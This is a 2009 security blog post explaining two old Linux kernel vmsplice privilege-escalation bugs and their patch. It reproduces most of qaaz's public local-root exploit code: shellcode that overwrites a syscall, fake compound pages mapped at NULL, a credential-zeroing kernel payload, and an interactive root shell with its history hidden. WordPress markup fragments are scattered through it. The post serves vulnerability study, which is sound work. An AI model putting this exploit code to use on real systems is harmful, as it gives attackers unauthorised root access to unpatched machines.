xorl %eax, %eax

CVE-2008-0009/CVE-2008-0010: Linux kernel vmsplice(2) Privilege Escalation

with 3 comments

Another post about _old_ but damn sexy kernel level vulnerabilities.
Both bugs were disclosed on February 2008 as 0day vulnerabilities with freaking awesome exploit codes by qaaz. Almost the exact same moment of the exploit codes release by qaaz, cliph of iSec.pl was publishing an advisory for the exact same vulnerabilities. I’m not going to try to attempt to find what the relation between those two events might be since this is completely off topic.
So, the first bug (CVE-2008-0009) was referring to 2.6.22 through 2.6.24 releases of Linux kernel. Specifically, here is the susceptible code from 2.6.23’s fs/splice.c.

/*
 * For lack of a better implementation, implement vmsplice() to userspace
 * as a simple copy of the pipes pages to the user iov.
 */
static long vmsplice_to_user(struct file *file, const struct iovec __user *iov,
                             unsigned long nr_segs, unsigned int flags)
{
        struct pipe_inode_info *pipe;
        struct splice_desc sd;
        ssize_t size;
        int error;
        long ret;
   ...
                /*
                 * Get user address base and length for this iovec.
                 */
                error = get_user(base, &iov->iov_base);
                if (unlikely(error))
                        break;
                error = get_user(len, &iov->iov_len);
                if (unlikely(error))
                        break;

                /*
                 * Sanity check this iovec. 0 read succeeds.
                 */
                if (unlikely(!len))
                        break;
                if (unlikely(!base)) {
                        error = -EFAULT;
                        break;
                }

                sd.len = 0;
                sd.total_len = len;
                sd.flags = flags;
                sd.u.userptr = base;
                sd.pos = 0;

                size = __splice_from_pipe(pipe, &sd, pipe_to_user);
                if (size < 0) {
   ...
        return ret;
}
&#91;/sourcecode&#93;

This code is part of vmsplice(2) system call. As we can read from <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/vmsplice.2.html">its man page</a>, this system call was introduced in 2.6.17 release of the Linux kernel and it is used to map a specified user memory range into a pipe.
In the above code, we can see that it retrieves the contents of the user controlled iovec structure (second argument of the system call), using get_user() and stores it into 'base' and 'len' respectively. After that, some basic sanity checks for 'len' equal to zero and 'base' equal to NULL take place. The next part is really interesting, vmsplice_to_user() will directly initialize 'splice_desc' structure with the user controlled 'len' as 'total_len' and 'base' as 'userptr'. At last, it will invoke __splice_from_pipe() to splice the data from 'pipe' instructed by 'sd' using 'pipe_to_user' handler routine. __splice_from_pipe() calls the handler routine (in this case pipe_to_user()) with no checks being performed on the user controlled pointer passed to it. A quick look at pipe_to_user() reveals this:


static int pipe_to_user(struct pipe_inode_info *pipe, struct pipe_buffer *buf,
                        struct splice_desc *sd)
{
        char *src;
        int ret;
   ...
        /*
         * See if we can use the atomic maps, by prefaulting in the
         * pages and doing an atomic copy
         */
        if (!fault_in_pages_writeable(sd->u.userptr, sd->len)) {
                src = buf->ops->map(pipe, buf, 1);
                ret = __copy_to_user_inatomic(sd->u.userptr, src + buf->offset,
                                                        sd->len);
   ...
        return ret;
}

So basically, user has complete control over this __copy_to_user_inatomic() call. Because of this bug, you can read arbitrary bytes from a pipe. Of course, this does not sound so trivial to exploit. Here is what qaaz did in his diane_lane_fucked_hard.c fascinating code.

int	main(int argc, char *argv[])
{
	int		pi[2];
	long		addr;
	struct iovec	iov;

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	if (!uid || !gid)
		die("!@#$", 0);

	addr = get_target();
	printf("[+] addr: 0x%lx\n", addr);

So, he initializes ‘uid’ and ‘gid’ and if you’re already root it just exits with a message full of anger. :P
Otherwise, it will call get_target() to retrieve the location of ‘sys_vm86old’ system call from /proc/kallsyms like that:

#define TARGET_PATTERN		" sys_vm86old"
     ...
long	get_target()
{
	FILE	*f;
	long	addr = 0;
	char	line[128];

	f = fopen("/proc/kallsyms", "r");
	if (!f) die("/proc/kallsyms", errno);

	while (fgets(line, sizeof(line), f)) {
		if (strstr(line, TARGET_PATTERN)) {
			addr = strtoul(line, NULL, 16);
			break;
		}
	}

	fclose(f);
	return addr;
}

After getting that address, it will move back to main() and execute this:

#define TRAMP_CODE		(void *) trampoline	
#define TRAMP_SIZE		( sizeof(trampoline) - 1 )

unsigned char trampoline[] =
"\x8b\x5c\x24\x04"		/* mov    0x4(%esp),%ebx	*/
"\x8b\x4c\x24\x08"		/* mov    0x8(%esp),%ecx	*/
"\x81\xfb\x69\x7a\x00\x00"	/* cmp    $31337,%ebx		*/
"\x75\x02"			/* jne    +2			*/
"\xff\xd1"			/* call   *%ecx			*/
"\xb8\xea\xff\xff\xff"		/* mov    $-EINVAL,%eax		*/
"\xc3"				/* ret				*/
;
     ...
	if (pipe(pi) < 0)
		die("pipe", errno);

	iov.iov_base = (void *) addr;
	iov.iov_len  = TRAMP_SIZE;
&#91;/sourcecode&#93;

He initializes pipe 'pi' using the equivalent system call and then sets iovec's base address to that of sys_vm86 and its length to that of trampoline's size. His trampoline code, simply moves the first two arguments from the stack into EBX and ECX respectively, then compares EBX with 31337 and if it is not equal it will immediately return, in any other case, it will call the function stored into ECX.
His code continues like this:

&#91;sourcecode language="c"&#93;
	write(pi&#91;1&#93;, TRAMP_CODE, TRAMP_SIZE);
	_vmsplice(pi&#91;0&#93;, &iov, 1, 0);

	gimmeroot();
&#91;/sourcecode&#93;

He writes the above trampoline code into the pipe's writing file descriptor, and then he calls _vmsplice() passing the reading file descriptor of the pipe, the iovec structure, 1 to map once the range specified in the iovec structure and no flags. This will write the contents of TRAMP_CODE into sys_vm86 system call's location since this is where iov.iov_base points to!
And the awesomeness is not over yet...

&#91;sourcecode language="c"&#93;
#define TARGET_PATTERN		" sys_vm86old"
#define TARGET_SYSCALL		113
    ...
#define gimmeroot()		syscall(TARGET_SYSCALL, 31337, kernel_code, 1, 2, 3, 4)
    ...
void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p&#91;0&#93; == uid && p&#91;1&#93; == uid &&
		    p&#91;2&#93; == uid && p&#91;3&#93; == uid &&
		    p&#91;4&#93; == gid && p&#91;5&#93; == gid &&
		    p&#91;6&#93; == gid && p&#91;7&#93; == gid) {
			p&#91;0&#93; = p&#91;1&#93; = p&#91;2&#93; = p&#91;3&#93; = 0;
			p&#91;4&#93; = p&#91;5&#93; = p&#91;6&#93; = p&#91;7&#93; = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p&#91;0&#93; = p&#91;1&#93; = p&#91;2&#93; = ~0;
			break;
		}
		p++;
	}	
}
&#91;/sourcecode&#93;

gimmeroot() is a simple macro that will call sys_vm86 passing 31337 as its first argument and 'kernel_code' as its second. If the trampoline code which is located now in the address of sys_vm86 encounters those arguments, it will invoke 'kernel_code' which would be executed in ring0.
Moving to kernel_code(), this is another cool shellcode code. He retrieves the address of the current task's task_struct using get_current(), and then scans it to find our UID and GID and set them to zero. get_current() is simply:

&#91;sourcecode language="c"&#93;
static inline __attribute__((always_inline))
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}
&#91;/sourcecode&#93;

The final part of the main() function is quite obvious...

&#91;sourcecode language="c"&#93;
	if (getuid() != 0)
		die("wtf", 0);

	printf("&#91;+&#93; root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
	return 0;
}
&#91;/sourcecode&#93;

Just spawn a bash root shell with history file linked to /dev/null.
The second vulnerability in cliph's advisory was part of copy_from_user_mmap_sem() which can also be found at fs/splice.c like this:

&#91;sourcecode language="c"&#93;
/*
 * Do a copy-from-user while holding the mmap_semaphore for reading, in a
 * manner safe from deadlocking with simultaneous mmap() (grabbing mmap_sem
 * for writing) and page faulting on the user memory pointed to by src.
 * This assumes that we will very rarely hit the partial != 0 path, or this
 * will not be a win.
 */
static int copy_from_user_mmap_sem(void *dst, const void __user *src, size_t n)
{
        int partial;

        pagefault_disable();
        partial = __copy_from_user_inatomic(dst, src, n);
        pagefault_enable();

        /*
         * Didn't copy everything, drop the mmap_sem and do a faulting copy
         */
        if (unlikely(partial)) {
                up_read(&current->mm->mmap_sem);
                partial = copy_from_user(dst, src, n);
                down_read(&current->mm->mmap_sem);
        }

        return partial;
}

Clearly, user has almost complete control over the __copy_from_user_inatomic() call since his pointer ‘src’ is not checked and can be set to any valid address. In his advisory, cliph states that this can lead to indirect arbitrary read of kernel memory but he was not aware if it was exploitable or not. And here comes qaaz with his amazing jessica_biel_naked_in_my_bed.c code.
This vulnerability was present since the introduction of vmsplice(2) system call, consequently it affects 2.6.17 up to 2.6.24.1. His code starts like this…

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};
    ...
int	main(int argc, char *argv[])
{
	int		pi[2];
	size_t		map_size;
	char *		map_addr;
	struct iovec	iov;
	struct page *	pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	if (!uid || !gid)
		die("!@#$", 0);

	/*****/
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

Once again, he gets his user’s IDs and checks for not being already root on the system. He then initializes the first two elements of ‘pages’ array and does this:

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

Here is a simple allocation using mmap(2) system call to allocate ‘map_size’ bytes starting at pages[0] location (which is 0, meaning NULL). If the allocation fails it’ll exit. Else, it will do this:

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[0]);
	printf("[+] page: 0x%lx\n", pages[1]);

	pages[0]->flags    = 1 << PG_compound;
	pages&#91;0&#93;->private  = (unsigned long) pages[0];
	pages[0]->count    = 1;
	pages[1]->lru.next = (long) kernel_code;

So, it zeroed out the allocated space and informs the user about its location along. Next, he sets its PG_compound flag which is defined at include/linux/page-flags.h and it is used to mark this page as part of a compound page. He also sets its ‘private’ address to pages[0] value, ‘count’ that represents the usage count to 1 and finally, the next page’s next LRU (Least Recently Used) cache pointer of its list_head structure, to the kernel_code()’s address which you’ll at the end how cool it is.
His kernel_code() routine is almost identical to the one of the previous exploit as you can see here:

void	kernel_code()
{
	int	i;
	uint	*p = get_current();

	for (i = 0; i < 1024-13; i++) {
		if (p&#91;0&#93; == uid && p&#91;1&#93; == uid &&
		    p&#91;2&#93; == uid && p&#91;3&#93; == uid &&
		    p&#91;4&#93; == gid && p&#91;5&#93; == gid &&
		    p&#91;6&#93; == gid && p&#91;7&#93; == gid) {
			p&#91;0&#93; = p&#91;1&#93; = p&#91;2&#93; = p&#91;3&#93; = 0;
			p&#91;4&#93; = p&#91;5&#93; = p&#91;6&#93; = p&#91;7&#93; = 0;
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p&#91;0&#93; = p&#91;1&#93; = p&#91;2&#93; = ~0;
			break;
		}
		p++;
	}	

	exit_kernel();
}
&#91;/sourcecode&#93;

However, this code has support for both x86 and x86_64 as we can read from get_current() routine:

&#91;sourcecode language="c"&#93;
#if defined (__i386__)
    ...
static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"
	"movl (%%eax), %0"
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}

#elif defined (__x86_64__)
    ...
static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}

#else
#error "unsupported arch"
#endif
&#91;/sourcecode&#93;

The only difference in order to retrieve the current task's task_struct on x86_64 is that you'll have to use the GS segment selector as you can read in the above code. In addition to this, kernel_code() includes another routine which is called last and is named exit_kernel(). This is also written for both architectures like this:

&#91;sourcecode language="c"&#93;
#define STACK(x)	(x + sizeof(x) - 40)
    ...
char	exit_stack&#91;1024 * 1024&#93;;
    ...
#if defined (__i386__)
    ...
#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"
	"movl %1, 0x0c(%%esp) ;"
	"movl %2, 0x08(%%esp) ;"
	"movl %3, 0x04(%%esp) ;"
	"movl %4, 0x00(%%esp) ;"
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}
    ...
#elif defined (__x86_64__)
    ...
#define USER_CS		0x23
#define USER_SS		0x2b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"
	"movq %1, 0x18(%%rsp) ;"
	"movq %2, 0x10(%%rsp) ;"
	"movq %3, 0x08(%%rsp) ;"
	"movq %4, 0x00(%%rsp) ;"
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}
&#91;/sourcecode&#93;

What it does is setting the segment selectors as well as exit_stack and triggering an interrupt return to smoothly return from kernel mode. Now, that the second page is initialized with a next LRU cache pointing to that code, the following code is executed:

&#91;sourcecode language="c"&#93;
	/*****/
	pages&#91;2&#93; = *(void **) pages&#91;0&#93;;
	pages&#91;3&#93; = pages&#91;2&#93; + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages&#91;2&#93;, map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("&#91;+&#93; mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("&#91;+&#93; page: 0x%lx\n", pages&#91;2&#93;);
	printf("&#91;+&#93; page: 0x%lx\n", pages&#91;3&#93;);
&#91;/sourcecode&#93;

pages&#91;2&#93; and pages&#91;3&#93; are initialized to be the exact next ones and another allocation takes place. Mapped area is zeroed out and the user is informed with the location of those pages. This page is now set like this:

&#91;sourcecode language="c"&#93;
	pages&#91;2&#93;->flags    = 1 << PG_compound;
	pages&#91;2&#93;->private  = (unsigned long) pages[2];
	pages[2]->count    = 1;
	pages[3]->lru.next = (long) kernel_code;

Once again, is set to PG_compound of pages[2] and pages[3]’s next LRU cache pointer is set to point to the kernel_code() shellcode function of the exploit code. A new allocation is made now…

	/*****/
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[4]);

This will request the page that is already mapped in pages[0] and consequently, mmap(2) will return a page between pages[0] and pages[2].

#define PIPE_BUFFERS	16
     ...
	/*****/
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

The ‘map_size’ is calculated for allocation of three pipe buffers. Then, mmap(2) is called but it would not be able to map NULL since it is already mapped at pages[0]. It will map it in some other location and do the following:

	/*****/
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die("munmap", errno);
&#91;/sourcecode&#93;

This make munmap() free part of the previously allocated buffer. Specifically, you can consider the allocations like this:

<pre>
   pages[0]         pages[1]         pages[2]       pages[3]
--------------   --------------   --------------  --------------     
 from: 0          from: 0x20       from: 0x4000    from: 0x4020
 to:   0x1000     lru-&gt;next: kc    to:   0x5000    lru-&gt;next: kc
 PG_compound                       PG_compound


before memory unmap:

         pages[4]
      --------------
       from: 0xb7d97000
       to:   0xb7dc9000

unmap: 0xb7d97000 + 0x30000 (= 0xb7dc7000) up to 0xb7dc8000

After unmap:

         pages[4]
      --------------
       from: 0xb7d97000
       to:   0xb7dc7000

As well as page located at: 0xb7dc9000
</pre>

Now, that kernel memory is arranged he creates the pipe pair and immediately closes reading file descriptor of the pipe like this:


	/*****/
	if (pipe(pi) < 0) die("pipe", errno);
	close(pi&#91;0&#93;);

	iov.iov_base = map_addr;
	iov.iov_len  = ULONG_MAX;
&#91;/sourcecode&#93;

The iovec structure is initialized with the address of the last allocation (pages&#91;4&#93; one), and its length is set to 0xffffffff (for 32-bit arhitectures). The final code is...

&#91;sourcecode language="c"&#93;
	signal(SIGPIPE, exit_code);
	_vmsplice(pi&#91;1&#93;, &iov, 1, 0);
	die("vmsplice", errno);
	return 0;
}
&#91;/sourcecode&#93;

In case of a SIGPIPE signal sent to our process, exit_code() routine will be executed and the evil vmsplice(2) system call takes place. It will request the copy from 'map_addr' which will reach copy_from_user_mmap_sem() since this needs a semaphore lock to avoid mmap() because of the last mmap()/munmap() operations. However, since the destination (pi&#91;0&#93; file descriptor) is closed, it will lead to a "broken pipe" (aka SIGPIPE) signal sent to our process from the kernel and indirectly calling the LRU-&gt;next which contains the address of the compound page's put_page() routine.
This could be considered as a kernel-like .DTORS overwrite since put_page() is used when a PG_compound flag is encountered on a page. Specifically, lru-&gt;next will have to point to a callback function that will be normally set by SLAB allocator during initialization of the page as we can read at mm/slab.c:

&#91;sourcecode language="c"&#93;
static inline void page_set_cache(struct page *page, struct kmem_cache *cache)
{
        page->lru.next = (struct list_head *)cache;
}

But since qaaz set this by his own, during the deallocation of that page, the following code from include/linux/mm.h will be executed:

static inline compound_page_dtor *get_compound_page_dtor(struct page *page)
{
        return (compound_page_dtor *)page[1].lru.next;
}

and this will be used by put_compound_page() of mm/swap.c like that:

static void put_compound_page(struct page *page)
{
        page = compound_head(page);
        if (put_page_testzero(page)) {
                compound_page_dtor *dtor;

                dtor = get_compound_page_dtor(page);
                (*dtor)(page);
        }
}

Because of this, free on pages[0] and pages[2] would result into (compound_page_dtor *)page[1].lru.next(page) and (compound_page_dtor *)page[3].lru.next(page) being executed respectively. But this is where kernel_code() resides!
After executing this, exit_code() function is called. This is quite simple…

void	exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	die("/bin/bash", errno);
}

So, how did they patched(?) this?
This is a really nice question… ;P
After numerous failed attempts they came up with this patch:

  		}

+		if (unlikely(!access_ok(VERIFY_WRITE, base, len))) {
+			error = -EFAULT;
+			break;
+		}
+
  		sd.len = 0;

For vmsplice_to_user() and a similar one for copy_from_user_mmap_sem():

  	int partial;

+	if (!access_ok(VERIFY_READ, src, n))
+		return -EFAULT;
+
  	pagefault_disable();

As you may already know, access_ok() is a simple macro from arch/x86/include/asm/uaccess.h that uses __range_not_ok() to check that src+n is inside an accessible range.
Tip: on x86 as well as x86_64 the first argument of access_ok() is completely ignored.
This is definitely one of those exploit codes that makes you wanna cry from emotion and wonder…

Written by xorl

August 10, 2009 at 09:02

Posted in linux, vulnerabilities

3 Responses

Subscribe to comments with RSS.

  1. Awesome analysis man! Post more exploit analysis plz :)

    thanasisk

    August 10, 2009 at 15:09

  2. Some classic information about this vulnerability, courtesy of the Hungarian:
    http://lwn.net/Articles/269532/

    spender

    August 10, 2009 at 15:21

  3. @thanasisk:
    I believe I should thanks 0x29A for his suggestion:
    https://xorl.wordpress.com/2009/07/18/linux-kernel-nvram-integer-overflow/#comment-303
    As well as nnp who “somewhere” said that it would be nice if I was writing about exploit codes too. Of course, I’ll only do this for public exploits. There will be no 0day in this blog :) never.

    ret I’m sorry for making you angry with these posts :P

    xorl

    August 10, 2009 at 15:31


Leave a comment